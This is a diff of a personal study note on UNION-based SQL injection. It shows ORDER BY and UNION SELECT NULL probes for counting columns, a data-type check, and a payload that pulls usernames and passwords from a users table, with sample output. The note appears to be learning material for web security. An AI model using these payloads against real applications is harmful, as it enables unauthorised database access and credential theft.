fathimakm/web_security_notes/sql_injection.md

     - the number and order of columns must be the same in all queries, data type must be the same
-    - to determine the column (use ORDER BY, use NULL VALUES) `' ORDER by 3 --  (some doesn't accept -- so we can use #)` `' ORDER by 3 # (to url encode, CTRL+U)`
+    - to determine the column (use ORDER BY, use NULL VALUES)

+- to check the number of columns
+    `' ORDER by 3 --  (some doesn't accept -- so we can use #)`
+    `' ORDER by 3 # (to url encode, CTRL+U)`
     - 'ORDER+by+2%23 if 200 okay, 2 columns present
-- 'ORDER+by+3%23 if 500 internal server error, 3rd column not present
+    - 'ORDER+by+3%23 if 500 internal server error, 3rd column not present (3-1=2 colums only)

+    - another method
+        UNION SELECT NULL , if error incorrect no. of column UNION SELECT NULL, NULL ,if 200 okay , 2 columns

+- to check if data type is same, `' UNION SELECT 'a', 'a'#` this checks if data type of 1st column is text , and 2nd column is also text.

-    `www.test.com/app.php?id=' UNION SELECT username, password FROM users--` we did'n give id so it's emprt
+    `www.test.com/app.php?id=' UNION SELECT username, password FROM users--` we did'nt give id so it's empty
     `output:ac1, passw1, adm1, pass2`

 2. Interential(Blind)